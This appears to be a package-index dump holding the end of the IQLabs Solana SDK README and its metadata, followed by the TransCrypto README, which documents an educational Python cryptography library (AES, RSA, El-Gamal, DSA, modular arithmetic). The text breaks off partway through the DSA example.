#### `fetch_user_connections()`
Fetch all connections (friend requests) for a user by analyzing their UserState PDA transaction history. Each connection includes its `db_root_id`, identifying which app the connection belongs to.
| **Parameters** | `user_pubkey`: user public key (str or Pubkey)<br>`limit`: max number of transactions to fetch (optional)<br>`before`: signature to paginate from (optional)<br>`speed`: rate limit profile (optional) |
|----------|--------------------------|
| **Returns** | List of connection dicts with db_root_id, connection_pda, party_a, party_b, status, requester, blocker, timestamp |
**Example:**
```python
from iqlabs import reader
connections = await reader.fetch_user_connections(
my_pubkey,
speed="light",
limit=100
)
# Filter by status
pending_requests = [c for c in connections if c['status'] == 'pending']
friends = [c for c in connections if c['status'] == 'approved']
blocked = [c for c in connections if c['status'] == 'blocked']
# Check connection details
for conn in connections:
print(f"Party A: {conn['party_a']} <-> Party B: {conn['party_b']}, status: {conn['status']}")
```
---
### Table Management
#### `write_row()`
| **Parameters** | `connection`: AsyncClient<br>`signer`: Keypair<br>`db_root_id`: database ID (bytes or str)<br>`table_seed`: table name (bytes or str)<br>`row_json`: JSON row data (str)<br>`skip_confirmation`: skip tx confirmation (default: False) |
|----------|--------------------------|
| **Returns** | Transaction signature (str) |
**Example:**
```python
from iqlabs import writer
import json
# Write the first row to create the table
await writer.write_row(connection, signer, 'my-db', 'users', json.dumps({
"id": 1, "name": "Alice", "email": "alice@example.com"
}))
# Add another row to the same table
await writer.write_row(connection, signer, 'my-db', 'users', json.dumps({
"id": 2, "name": "Bob", "email": "bob@example.com"
}))
```
---
#### `read_table_rows()`
| **Parameters** | `account`: table PDA (Pubkey or str)<br>`before`: signature cursor for pagination (optional)<br>`limit`: max number of rows to fetch (optional)<br>`speed`: rate limit profile (optional) |
|----------|--------------------------|
| **Returns** | `list[dict]` |
**Example:**
```python
from iqlabs import reader
# Basic usage
rows = await reader.read_table_rows(table_pda, limit=50)
# Cursor-based pagination
older_rows = await reader.read_table_rows(table_pda, limit=50, before="sig...")
```
---
#### `get_tablelist_from_root()`
| **Parameters** | `connection`: AsyncClient<br>`db_root_id`: database ID (bytes or str) |
|----------|--------------------------|
| **Returns** | dict with `root_pda`, `creator`, `table_seeds`, `global_table_seeds` |
**Example:**
```python
from iqlabs import reader
result = await reader.get_tablelist_from_root(connection, 'my-db')
print('Creator:', result['creator'])
print('Table seeds:', result['table_seeds'])
```
---
#### `fetch_inventory_transactions()`
| **Parameters** | `public_key`: user public key (Pubkey)<br>`limit`: max count (int)<br>`before`: pagination cursor (optional, str) |
|----------|--------------------------|
| **Returns** | Transaction list |
**Example:**
```python
from iqlabs import reader
import json
my_files = await reader.fetch_inventory_transactions(my_pubkey, 20)
for tx in my_files:
metadata = None
try:
metadata = json.loads(tx['metadata'])
except:
metadata = None
if metadata and 'data' in metadata:
inline_data = metadata['data'] if isinstance(metadata['data'], str) else json.dumps(metadata['data'])
print(f"Inline data: {inline_data}")
else:
print(f"Signature: {tx['signature']}")
```
---
### Environment Settings
#### `set_rpc_url()`
| **Parameters** | `url`: Solana RPC URL (str) |
|----------|--------------------------|
| **Returns** | None |
**Example:**
```python
from iqlabs import set_rpc_url
set_rpc_url('https://your-rpc.example.com')
```
---
## Advanced Functions
These functions are advanced/internal, so this doc lists them only. For details, please see our [developer docs](https://iqlabs.dev).
- `manage_row_data()` (`writer`)
- `read_user_state()` (`reader`)
- `read_inventory_metadata()` (`reader`)
- `get_session_pda_list()` (`reader`)
- `derive_dm_seed()` (`utils`)
- `to_seed_bytes()` (`utils`)
---
## Additional Resources
- [IQLabs Official X](https://x.com/IQLabsOfficial)
- [IQLabs Official Website](https://iqlabs.dev)
| text/markdown | null | IQLabs <dev@iqlabs.io> | null | null | null | solana, blockchain, sdk, iqlabs, on-chain, inscription | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"solana>=0.32.0",
"solders>=0.21.0",
"anchorpy>=0.19.0",
"pycryptodome>=3.20.0",
"pytest>=7.0.0; extra == \"dev\"",
"pytest-asyncio>=0.21.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/IQCoreTeam/iqlabs-solana-sdk-python",
"Repository, https://github.com/IQCoreTeam/iqlabs-solana-sdk-python"
] | twine/6.2.0 CPython/3.13.2 | 2026-02-20T09:28:32.528551 | iqlabs_solana_sdk-0.1.5.tar.gz | 38,688 | 8a/b5/f6f4673e694551c6688d712e9b2e5142e335344434b76bb991f6aee6728d/iqlabs_solana_sdk-0.1.5.tar.gz | source | sdist | null | false | bbe258888da1bc0391b53dc75cb606c2 | d97566293a9149f503d1847caf183858d9c821a4b9216f88531b5a870e7919e7 | 8ab5f6f4673e694551c6688d712e9b2e5142e335344434b76bb991f6aee6728d | Apache-2.0 | [
"LICENSE"
] | 227 |
2.3 | transcrypto | 2.3.2 | Basic crypto primitives, not intended for actual use, but as a companion to --Criptografia, Métodos e Algoritmos-- | # TransCrypto
Basic cryptography primitives implementation, a companion to *"Criptografia, Métodos e Algoritmos"*.
Started in July/2025, by Daniel Balparda. Since version 1.0.2 it is PyPI package:
<https://pypi.org/project/transcrypto/>
- [TransCrypto](#transcrypto)
- [License](#license)
- [Design assumptions / Disclaimers](#design-assumptions--disclaimers)
- [CLI Apps](#cli-apps)
- [Programming API](#programming-api)
- [Install](#install)
- [Base Library](#base-library)
- [Humanized Sizes (IEC binary)](#humanized-sizes-iec-binary)
- [Humanized Decimal Quantities (SI)](#humanized-decimal-quantities-si)
- [Humanized Durations](#humanized-durations)
- [Execution Timing](#execution-timing)
- [Context manager](#context-manager)
- [Decorator](#decorator)
- [Manual use](#manual-use)
- [Key points](#key-points)
- [Serialization Pipeline](#serialization-pipeline)
- [Serialize](#serialize)
- [DeSerialize](#deserialize)
- [Cryptographically Secure Randomness](#cryptographically-secure-randomness)
- [Fixed-size random integers](#fixed-size-random-integers)
- [Uniform random integers in a range](#uniform-random-integers-in-a-range)
- [In-place secure shuffle](#in-place-secure-shuffle)
- [Random byte strings](#random-byte-strings)
- [Computing the Greatest Common Divisor](#computing-the-greatest-common-divisor)
- [Fast Modular Arithmetic](#fast-modular-arithmetic)
- [Chinese Remainder Theorem (CRT) – Pair](#chinese-remainder-theorem-crt--pair)
- [Modular Polynomials \& Lagrange Interpolation](#modular-polynomials--lagrange-interpolation)
- [Primality testing \& Prime generators, Mersenne primes](#primality-testing--prime-generators-mersenne-primes)
- [Cryptographic Hashing](#cryptographic-hashing)
- [SHA-256 hashing](#sha-256-hashing)
- [SHA-512 hashing](#sha-512-hashing)
- [File hashing](#file-hashing)
- [Symmetric Encryption Interface](#symmetric-encryption-interface)
- [Crypto Objects General Properties (`CryptoKey`)](#crypto-objects-general-properties-cryptokey)
- [AES-256 Symmetric Encryption](#aes-256-symmetric-encryption)
- [Key creation](#key-creation)
- [AES-256 + GCM (default)](#aes-256--gcm-default)
- [AES-256 + ECB (unsafe, fixed block only)](#aes-256--ecb-unsafe-fixed-block-only)
- [RSA (Rivest-Shamir-Adleman) Public Cryptography](#rsa-rivest-shamir-adleman-public-cryptography)
- [El-Gamal Public-Key Cryptography](#el-gamal-public-key-cryptography)
- [DSA (Digital Signature Algorithm)](#dsa-digital-signature-algorithm)
- [Security notes](#security-notes)
- [Advanced: custom primes generator](#advanced-custom-primes-generator)
- [Public Bidding](#public-bidding)
- [SSS (Shamir Shared Secret)](#sss-shamir-shared-secret)
- [Appendix: Development Instructions](#appendix-development-instructions)
- [Setup](#setup)
- [Updating Dependencies](#updating-dependencies)
- [Creating a New Version](#creating-a-new-version)
## License
Copyright 2026 Daniel Balparda <balparda@github.com>
Licensed under the ***Apache License, Version 2.0*** (the "License"); you may not use this file except in compliance with the License. You may obtain a [copy of the License here](http://www.apache.org/licenses/LICENSE-2.0).
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
## Design assumptions / Disclaimers
- The library is built to have reference, reliable, simple implementations of math and crypto primitives (e.g. `RawEncrypt()`/`RawSign()` and friends plus all the low-level primality and modular arithmetic). The issue is not that the library is unsafe, it is that the library is full of places that allow you to shoot yourself in the foot if you don't know what you are doing.
- The library also has advanced top-level methods that are cryptographically safe and might be used in real-world scenarios (e.g. `Encrypt()`/`Sign()` and friends).
- All library methods' `int` are tailored to be efficient with arbitrarily large integers.
- Everything **should work**, as the library is **extensively tested**, *but not necessarily the most efficient or safe for real-world cryptographic use.* For real-world crypto you might consider *other optimized/safe libraries* that were built to be resistant to malicious attacks.
- *All operations in this library may be vulnerable to timing attacks.* This may be a problem to your use-case or not depending on the situation.
All that being said, extreme care was taken that this is a good library with a solid safe implementation. *Have fun!*
## CLI Apps
- [TransCrypto/`transcrypto`](transcrypto.md): Does all the operations but allows you to shoot yourself in the foot;
- [Profiler/`profiler`](profiler.md): Measure transcrypto performance.
## Programming API
### Install
To use in your project just do:
```sh
pip3 install transcrypto
```
and then `from transcrypto.core import rsa` (or other parts of the library) for using it.
Known dependencies:
- [zstandard](https://pypi.org/project/zstandard/) ([docs](https://python-zstandard.readthedocs.org/))
- [cryptography](https://pypi.org/project/cryptography/) ([docs](https://cryptography.io/en/latest/))
- [gmpy2](https://pypi.org/project/gmpy2/) ([docs](https://gmpy2.readthedocs.io/en/latest/))
### Base Library
#### Humanized Sizes (IEC binary)
```py
from transcrypto.utils import human
human.HumanizedBytes(512) # '512 B'
human.HumanizedBytes(2048) # '2.000 KiB'
human.HumanizedBytes(5 * 1024**3) # '5.000 GiB'
```
Converts raw byte counts to binary-prefixed strings (`B`, `KiB`, `MiB`, `GiB`, `TiB`, `PiB`, `EiB`).
- For integer inputs `<1024`, returns an integer count with `B` (e.g. `'512 B'`).
- For float inputs `<1024`, returns 3 decimals with `B` (e.g. `'51.200 B'`).
- For values `≥1024`, returns 3 decimals.
- standard: 1 KiB = 1024 B, 1 MiB = 1024 KiB, …
- errors: negative inputs raise `base.InputError`
#### Humanized Decimal Quantities (SI)
```py
from transcrypto.utils import human
# Base (unitless)
human.HumanizedDecimal(950) # '950'
human.HumanizedDecimal(1500) # '1.500 k'
# With a unit (trimmed and attached)
human.HumanizedDecimal(1500, unit=' Hz ') # '1.500 kHz'
human.HumanizedDecimal(0.123456, unit='V') # '123.456 mV'
# Large magnitudes
human.HumanizedDecimal(3_200_000) # '3.200 M'
human.HumanizedDecimal(7.2e12, unit='B/s') # '7.200 TB/s'
```
Scales by powers of 1000 using SI prefixes to keep the displayed value in roughly `[1, 1000)` when possible.
- Supported large prefixes: `k`, `M`, `G`, `T`, `P`, `E`
- Supported small prefixes: `m`, `µ`, `n`, `p`, `f`, `a`
- Formatting uses 3 decimals for non-integer/unscaled values and for scaled values.
- unit handling: `unit` is stripped; `<1000` values include a space before the unit (`'950 Hz'`)
- errors: non-finite inputs raise `base.InputError` (negative values are supported and keep a leading `-`)
#### Humanized Durations
```py
from transcrypto.utils import human
human.HumanizedSeconds(0) # '0.000 s'
human.HumanizedSeconds(0.000004) # '4.000 µs'
human.HumanizedSeconds(0.25) # '250.000 ms'
human.HumanizedSeconds(42) # '42.000 s'
human.HumanizedSeconds(3661) # '1.017 h'
human.HumanizedSeconds(172800) # '2.000 d'
```
Chooses an appropriate time unit based on magnitude and formats with fixed precision:
- `< 1 ms`: microseconds with three decimals (`µs`)
- `< 1 s`: milliseconds with three decimals (`ms`)
- `< 60 s`: seconds with three decimals (`s`)
- `< 60 min`: minutes with three decimals (`min`)
- `< 24 h`: hours with three decimals (`h`)
- `≥ 24 h`: days with three decimals (`d`)
- special case: `0 → '0.000 s'`
- errors: negative or non-finite inputs raise `base.InputError`
#### Execution Timing
A flexible timing utility that works as a **context manager**, **decorator**, or **manual timer object**.
```py
from transcrypto.utils import timer
import time
```
##### Context manager
```py
with timer.Timer('Block timing'):
time.sleep(1.2)
# → logs: "Block timing: 1.200 s" (default via logging.info)
```
Starts timing on entry, stops on exit, and reports elapsed time automatically.
##### Decorator
```py
@timer.Timer('Function timing')
def slow_function():
time.sleep(0.8)
slow_function()
# → logs: "Function timing: 0.800 s"
```
Wraps a function so that each call is automatically timed.
##### Manual use
```py
tm = timer.Timer('Inline timing', emit_print=True)
tm.Start()
time.sleep(0.1)
tm.Stop() # prints: "Inline timing: 0.100 s"
```
Manual control over `Start()` and `Stop()` for precise measurement of custom intervals.
##### Key points
- **Label**: optional; if empty, output omits the label prefix
- **Output**:
- `emit_log=True` → `logging.info()` (default)
- `emit_print=True` → prints via `rich.console.Console().print()`
- Both can be enabled
- **Format**: elapsed time is shown using `HumanizedSeconds()`
- **Safety**:
- Cannot start an already started timer
- Cannot stop an unstarted or already stopped timer
(raises `Error`)
#### Serialization Pipeline
These helpers turn arbitrary Python objects into compressed and/or encrypted binary blobs, and back again — with detailed timing and size logging.
```py
from transcrypto.core import key
```
##### Serialize
```py
data = {'x': 42, 'y': 'hello'}
# Basic serialization
blob = key.Serialize(data)
# With compression and encryption
blob = key.Serialize(
data,
compress=9, # compression level (-22..22, default=3)
encryption_key=my_encryptor # must implement `key.Encryptor` (e.g., `aes.AESKey`)
)
# Save directly to file
key.Serialize(data, file_path='/tmp/data.blob')
```
Serialization path:
```text
obj → pickle → (compress) → (encrypt) → (save)
```
At each stage:
- Data size is measured using `HumanizedBytes`
- Duration is timed with `Timer`
- Results are logged once at the end
Compression levels:
`compress` uses `zstandard`; see table below for speed/ratio trade-offs:
| Level | Speed | Compression ratio | Typical use case |
| -------- | ------------| --------------------------------- | --------------------------------------- |
| -5 to -1 | Fastest | Poor (better than no compression) | Real-time or very latency-sensitive |
| 0…3 | Very fast | Good ratio | Default CLI choice, safe baseline |
| 4…6 | Moderate | Better ratio | Good compromise for general persistence |
| 7…10 | Slower | Marginally better ratio | Only if storage space is precious |
| 11…15 | Much slower | Slight gains | Large archives, not for runtime use |
| 16…22 | Very slow | Tiny gains | Archival-only, multi-GB datasets |
Errors: invalid compression level is clamped to range; other input errors raise `base.InputError`.
##### DeSerialize
```py
# From in-memory blob
obj = key.DeSerialize(data=blob)
# From file
obj = key.DeSerialize(file_path='/tmp/data.blob')
# With decryption
obj = key.DeSerialize(data=blob, decryption_key=my_decryptor)
```
Deserialization path:
```text
data/file → (decrypt) → (decompress if Zstd) → unpickle
```
- Compression is auto-detected via Zstandard magic numbers.
- All steps are timed/logged like in `Serialize`.
**Constraints & errors**:
- Exactly one of `data` or `file_path` must be provided.
- `file_path` must exist; `data` must be at least 4 bytes.
- Wrong key / authentication failure can raise `key.CryptoError`.
- Corrupted compressed blobs typically raise `zstandard.ZstdError` during decompression.
#### Cryptographically Secure Randomness
These helpers live in `saferandom` and wrap Python’s `secrets` with additional checks and guarantees for crypto use-cases.
```py
from transcrypto.core import bid
```
##### Fixed-size random integers
```py
# Generate a 256-bit integer (first bit always set)
r = saferandom.RandBits(256)
assert r.bit_length() == 256
```
Produces a crypto-secure random integer with exactly `n_bits` bits (`≥ 8`). The most significant bit is guaranteed to be `1`, so entropy is \~`n_bits−1` — negligible for large crypto sizes.
- errors: `n_bits < 8` → `base.InputError`
##### Uniform random integers in a range
```py
# Uniform between [10, 20] inclusive
n = saferandom.RandInt(10, 20)
assert 10 <= n <= 20
```
Returns a crypto-secure integer uniformly distributed over the closed interval `[min_int, max_int]`.
- constraints: `min_int ≥ 0` and `< max_int`
- errors: invalid bounds → `base.InputError`
##### In-place secure shuffle
```py
deck = list(range(10))
saferandom.RandShuffle(deck)
print(deck) # securely shuffled order
```
Performs an in-place Fisher–Yates shuffle using `secrets.randbelow`. Suitable for sensitive data ordering.
- constraints: sequence length ≥ 2
- errors: shorter sequences → `base.InputError`
##### Random byte strings
```py
# 32 random bytes
b = saferandom.RandBytes(32)
assert len(b) == 32
```
Generates `n_bytes` of high-quality crypto-secure random data.
- constraints: `n_bytes ≥ 1`
- errors: smaller values → `base.InputError`
#### Computing the Greatest Common Divisor
```py
>>> from transcrypto.core import modmath
>>> modmath.GCD(462, 1071)
21
>>> modmath.GCD(0, 17)
17
```
The function is `O(log(min(a, b)))` and handles arbitrarily large integers. To find Bézout coefficients `(x, y)` such that `ax + by = gcd(a, b)` do:
```py
>>> modmath.ExtendedGCD(462, 1071)
(21, 7, -3)
>>> 462 * 7 + 1071 * (-3)
21
```
Use-cases:
- modular inverses: `inv = x % m` when `gcd(a, m) == 1`
- solving linear Diophantine equations
- RSA / ECC key generation internals
#### Fast Modular Arithmetic
```py
from transcrypto.core import modmath
m = 2**256 - 189 # a large prime modulus
# Inverse ──────────────────────────────
x = 123456789
x_inv = modmath.ModInv(x, m)
assert (x * x_inv) % m == 1
# Division (x / y) mod m ──────────────
y = 987654321
z = modmath.ModDiv(x, y, m) # solves z·y ≡ x (mod m)
assert (z * y) % m == x % m
# Exponentiation ──────────────────────
exp = modmath.ModExp(3, 10**20, m) # ≈ log₂(y) time, handles huge exponents
```
##### Chinese Remainder Theorem (CRT) – Pair
```py
from transcrypto.core import modmath
# Solve:
# x ≡ 2 (mod 3)
# x ≡ 3 (mod 5)
x = modmath.CRTPair(2, 3, 3, 5)
print(x) # 8
assert x % 3 == 2
assert x % 5 == 3
```
Solves a system of two simultaneous congruences with **pairwise co-prime** moduli, returning the **least non-negative solution** `x` such that:
```text
x ≡ a1 (mod m1)
x ≡ a2 (mod m2)
0 ≤ x < m1 * m2
```
- **Requirements**:
- `m1 ≥ 2`, `m2 ≥ 2`, `m1 != m2`
- `gcd(m1, m2) == 1` (co-prime)
- **Errors**:
- invalid modulus values → `base.InputError`
- non co-prime moduli → `ModularDivideError`
This function is a 2-modulus variant; for multiple moduli, apply it iteratively or use a general CRT solver.
##### Modular Polynomials & Lagrange Interpolation
```py
# f(t) = 7t³ − 3t² + 2t + 5 (coefficients constant-term first)
coefficients = [5, 2, -3, 7]
print(modmath.ModPolynomial(11, coefficients, 97)) # → 19
# Given three points build the degree-≤2 polynomial and evaluate it.
pts = {2: 4, 5: 3, 7: 1}
print(modmath.ModLagrangeInterpolate(9, pts, 11)) # → 2
```
#### Primality testing & Prime generators, Mersenne primes
```py
modmath.IsPrime(2**127 - 1) # True (Mersenne prime)
modmath.IsPrime(3825123056546413051) # False (strong pseudo-prime)
# Direct Miller–Rabin with custom witnesses
modmath.MillerRabinIsPrime(961748941, witnesses={2,7,61})
# Infinite iterator of primes ≥ 10⁶
for p in modmath.PrimeGenerator(1_000_000):
print(p)
if p > 1_000_100:
break
# Secure random 384-bit prime (for RSA/ECC experiments)
p384 = modmath.NBitRandomPrimes(384).pop()
for k, m_p, perfect in modmath.MersennePrimesGenerator(0):
print(f'p = {k:>8} M = {m_p} perfect = {perfect}')
if k > 10000: # stop after a few
break
```
#### Cryptographic Hashing
Simple, fixed-output-size wrappers over Python’s `hashlib` for common digest operations, plus file hashing.
```py
from transcrypto.core import hashes
```
##### SHA-256 hashing
```py
h = hashes.Hash256(b'hello world')
assert len(h) == 32 # bytes
print(h.hex()) # 64 hex chars
```
Computes the SHA-256 digest of a byte string, returning exactly 32 bytes (256 bits). Suitable for fingerprints, commitments, or internal crypto primitives.
##### SHA-512 hashing
```py
h = hashes.Hash512(b'hello world')
assert len(h) == 64 # bytes
print(h.hex()) # 128 hex chars
```
Computes the SHA-512 digest of a byte string, returning exactly 64 bytes (512 bits). Higher collision resistance and larger output space than SHA-256.
##### File hashing
```py
# Default SHA-256
fh = hashes.FileHash('/path/to/file')
print(fh.hex())
# SHA-512
fh2 = hashes.FileHash('/path/to/file', digest='sha512')
```
Hashes a file from disk in streaming mode. By default uses SHA-256; `digest='sha512'` switches to SHA-512.
- constraints:
- `digest` must be `'sha256'` or `'sha512'`
- `full_path` must exist
- errors: invalid digest or missing file → `base.InputError`
#### Symmetric Encryption Interface
`key.Encryptor` and `key.Decryptor` are runtime-checkable protocols that define the **byte-in / byte-out** contract for symmetric ciphers.
- **Metadata handling** — if the algorithm uses a `nonce` or `tag`, the implementation must handle it internally (e.g., append it to ciphertext).
- **AEAD modes** — if supported, `associated_data` must be authenticated; otherwise, a non-`None` value should raise `base.InputError`.
```py
from transcrypto.core import key
class MyAES(key.Encryptor, key.Decryptor):
def Encrypt(self, plaintext: bytes, *, associated_data=None) -> bytes:
...
def Decrypt(self, ciphertext: bytes, *, associated_data=None) -> bytes:
...
```
#### Crypto Objects General Properties (`CryptoKey`)
Cryptographic objects all derive from the `CryptoKey` class and will all have some important characteristics:
- Will be safe to log and print, i.e., implement safe `__str__()` and `__repr__()` methods (in actuality `repr` will be exactly the same as `str`). The `__str__()` should always fully print the public parts of the object and obfuscate the private ones. This obfuscation allows for some debugging, if needed, but if the secrets are "too short" then it can be defeated by brute force. For usual crypto defaults the obfuscation is fine. The obfuscation is the fist 4 bytes of the SHA-512 for the value followed by an ellipsis (e.g. `c9626f16…`).
- It will have a `_DebugDump()` method that **does print secrets** and can be used for **debugging only**.
- Can be easily serialized to `bytes` by the `blob` property and to base-64 encoded `str` by the `encoded` property.
- Can be serialized encrypted to `bytes` by the `Blob(encryption_key=[key.Encryptor])` method and to encrypted base-64 encoded `str` by the `Encoded(encryption_key=[key.Encryptor])` method.
- Can be instantiated back as an object from `str` or `bytes` using the `Load(data, decryption_key=[key.Decryptor] | None)` method. The `Load()` will decide how to build the object and will work universally with all the serialization options discussed above.
Example:
<!-- cspell:disable -->
```py
from transcrypto.core import aes, rsa
priv = rsa.RSAPrivateKey.New(512) # small key, but good for this example
print(str(priv)) # safe, no secrets
# ▶ RSAPrivateKey(RSAPublicKey(public_modulus=pQaoxy-QeXSds1k9WsGjJw==, encrypt_exp=AQAB), modulus_p=f18141aa…, modulus_q=67494eb9…, decrypt_exp=c96db24a…)
print(priv._DebugDump()) # UNSAFE: prints secrets
# ▶ RSAPrivateKey(public_modulus=219357196311600536151291741191131996967, encrypt_exp=65537, modulus_p=13221374197986739361, modulus_q=16591104148992527047, decrypt_exp=37805202135275158391322585315542443073, remainder_p=9522084656682089473, remainder_q=8975656462800098363, q_inverse_p=11965562396596149292)
print(priv.blob)
# ▶ b"(\xb5/\xfd \x98\xc1\x04\x00\x80\x04\x95\x8d\x00\x00\x00\x00\x00\x00\x00\x8c\x0ftranscrypto.rsa\x94\x8c\rRSAPrivateKey\x94\x93\x94)\x81\x94]\x94(\x8a\x11'\xa3\xc1Z=Y\xb3\x9dty\x90/\xc7\xa8\x06\xa5\x00J\x01\x00\x01\x00\x8a\t\xa1\xc4\x83\x81\xc8\xc1{\xb7\x00\x8a\t\xc7\x8a5\xf0Qq?\xe6\x00\x8a\x10A$&\x82!\x1cy\x89r\xef\xeb\xa7_\x04q\x1c\x8a\t\x01\xbc\xbb\x8a\x8b=%\x84\x00\x8a\x08;\x94#s\xff\xef\x8f|\x8a\t,\x9c\xe2z\x9a7\x0e\xa6\x00eb."
print(priv.encoded)
# ▶ KLUv_WBwAIELAIAElWUBAAAAAAAAjA90cmFuc2NyeXB0by5yc2GUjA1SU0FQcml2YXRlS2V5lJOUKYGUXZQoikHf1EvsmZedAZve7TrLmobLAwuRIr_77TLG6G_0fsLGThERVJu075be8PLjUQYnLXcacZFQ5Fb1Iy1WtiE985euAEoBAAEAiiFR9ngiXMzkf41o5CRBY3h0D4DJVisDDhLmAWsiaHggzQCKIS_cmQ6MKXCtROtC7c_Mrsi9A-9NM8DksaHaRwvy6uTZAIpB4TVbsLxc41TEc19wIzpxbi9y5dW5gdfTkRQSSiz0ijmb8Xk3pyBfKAv8JbHp8Yv48gNZUfX67qq0J7yhJqeUoACKIbFb2kTNRzSqm3JRtjc2BPS-FnLFdadlFcV4-6IW7eqLAIogFZfzDN39gZLR9uTz4KHSTaqxWrJgP8-YYssjss6FlFKKIIItgCDv7ompNpY8gBs5bibN8XTsr-JOYSntDVT5Fe5vZWIu
aes_key = aes.AESKey(key256=b'x' * 32)
print(aes_key)
# ▶ AESKey(key256=86a86df7…)
encrypted = priv.Blob(encryption_key=aes_key)
print(priv == rsa.RSAPrivateKey.Load(encrypted, decryption_key=aes_key))
# ▶ True
```
<!-- cspell:enable -->
#### AES-256 Symmetric Encryption
Implements AES-256 in **GCM mode** for authenticated encryption and decryption, plus an **ECB mode** helper for fixed-size block encoding.
Also includes a high-iteration PBKDF2-based key derivation from static passwords.
##### Key creation
```py
from transcrypto.core import aes
# From raw bytes (must be exactly 32 bytes)
aes_key = aes.AESKey(key256=b'\x00' * 32)
# From a static password (slow, high-iteration PBKDF2-SHA256)
aes_key = aes.AESKey.FromStaticPassword('correct horse battery staple')
print(aes_key.encoded) # URL-safe Base64
```
- **Length**: `key256` must be exactly 32 bytes
- `FromStaticPassword()`:
- Uses PBKDF2-HMAC-SHA256 with **fixed** salt and \~2 million iterations
- Designed for **interactive** password entry, **not** for password databases
##### AES-256 + GCM (default)
```py
data = b'secret message'
aad = b'metadata'
# Encrypt (returns IV + ciphertext + tag)
ct = aes_key.Encrypt(data, associated_data=aad)
# Decrypt
pt = aes_key.Decrypt(ct, associated_data=aad)
assert pt == data
```
- **Security**:
- Random 128-bit IV (`iv`) per encryption
- Authenticated tag (128-bit) ensures integrity
- Optional `associated_data` is authenticated but not encrypted
- **Errors**:
- Tag mismatch or wrong key → `key.CryptoError`
##### AES-256 + ECB (unsafe, fixed block only)
```py
# ECB mode is for 16-byte block encoding ONLY
ecb = aes_key.ECBEncoder()
block = b'16-byte string!!'
ct_block = ecb.Encrypt(block)
pt_block = ecb.Decrypt(ct_block)
assert pt_block == block
# Hex helpers
hex_ct = ecb.EncryptHex('00112233445566778899aabbccddeeff') # 128 bits (1 block)
hex_pt = ecb.DecryptHex(hex_ct)
assert hex_pt == '00112233445566778899aabbccddeeff'
hex_ct2 = ecb.EncryptHex256('00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff')
hex_pt2 = ecb.DecryptHex256(hex_ct2)
assert hex_pt2 == '00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
```
- **ECB mode**:
- 16-byte plaintext ↔ 16-byte ciphertext
- No padding, no IV, no integrity — **do not use for general encryption**
- `associated_data` not supported
Key points:
- **GCM mode** is secure for general use; ECB mode is for special low-level operations
- **Static password derivation** is intentionally slow to resist brute force
- All sizes and parameters are validated with `base.InputError` on misuse
#### RSA (Rivest-Shamir-Adleman) Public Cryptography
<https://en.wikipedia.org/wiki/RSA_cryptosystem>
This implementation is raw RSA, no OAEP or PSS! It works on the actual integers. For real uses you should look for higher-level implementations.
By default and deliberate choice the *encryption exponent* will be either 7 or 65537, depending on the size of `phi=(p-1)*(q-1)`. If `phi` allows it the larger one will be chosen to avoid Coppersmith attacks.
```py
from transcrypto.core import rsa
# Generate a key pair
priv = rsa.RSAPrivateKey.New(2048) # 2048-bit modulus
pub = rsa.RSAPublicKey.Copy(priv) # public half
print(priv.public_modulus.bit_length()) # 2048
# Safe Encrypt & decrypt
msg = b'xyz'
cipher = pub.Encrypt(msg, associated_data=b'aad')
plain = priv.Decrypt(cipher, associated_data=b'aad')
assert plain == msg
# Safe Sign & verify
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Encrypt & decrypt
msg = 123456789 # (Zero is forbidden by design; smallest valid message is 1.)
cipher = pub.RawEncrypt(msg)
plain = priv.RawDecrypt(cipher)
assert plain == msg
# Raw Sign & verify
signature = priv.RawSign(msg)
assert pub.RawVerify(msg, signature)
# Blind signatures (obfuscation pair) - only works on raw RSA
pair = rsa.RSAObfuscationPair.New(pub)
blind_msg = pair.ObfuscateMessage(msg) # what you send to signer
blind_sig = priv.RawSign(blind_msg) # signer’s output
sig = pair.RevealOriginalSignature(msg, blind_sig)
assert pub.RawVerify(msg, sig)
```
#### El-Gamal Public-Key Cryptography
[https://en.wikipedia.org/wiki/ElGamal\_encryption](https://en.wikipedia.org/wiki/ElGamal_encryption)
This is **raw El-Gamal** over a prime field — no padding, no hashing — and is **not** DSA.
For real-world deployments, use a high-level library with authenticated encryption and proper encoding.
```py
from transcrypto.core import elgamal
# Shared parameters (prime modulus, group base) for a group
shared = elgamal.ElGamalSharedPublicKey.NewShared(256)
print(shared.prime_modulus)
print(shared.group_base)
# Public key from private
priv = elgamal.ElGamalPrivateKey.New(shared)
pub = elgamal.ElGamalPublicKey.Copy(priv)
# Safe Encrypt & decrypt
msg = b'xyz'
cipher = pub.Encrypt(msg, associated_data=b'aad')
plain = priv.Decrypt(cipher, associated_data=b'aad')
assert plain == msg
# Safe Sign & verify
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Encryption
msg = 42
cipher = pub.RawEncrypt(msg)
plain = priv.RawDecrypt(cipher)
assert plain == msg
# Raw Signature verify
sig = priv.RawSign(msg)
assert pub.RawVerify(msg, sig)
```
Key points:
- **Security parameters**:
- Recommended `prime_modulus` bit length ≥ 2048 for real security
- Random values from `saferandom.RandBits`
- **Ephemeral keys**:
- Fresh per encryption/signature
- Must satisfy `gcd(k, p-1) == 1`
- **Errors**:
- Bad ranges → `base.InputError`
- Invalid math relationships → `key.CryptoError`
- **Group sharing**:
- Multiple parties can share `(p, g)` but have different `(individual_base, decrypt_exp)`
#### DSA (Digital Signature Algorithm)
[https://en.wikipedia.org/wiki/Digital\_Signature\_Algorithm](https://en.wikipedia.org/wiki/Digital_Signature_Algorithm)
This is **raw DSA** over a prime field — **no hashing or padding**. You sign/verify **integers** modulo `q` (`prime_seed`). For real use, hash the message first (e.g., SHA-256) and then map to an integer `< q`.
```py
from transcrypto.core import dsa
# Shared parameters (p, q, g) - Safe Sign/Verify requires q > 512 bits
shared = dsa.DSASharedPublicKey.NewShared(2048, 520)
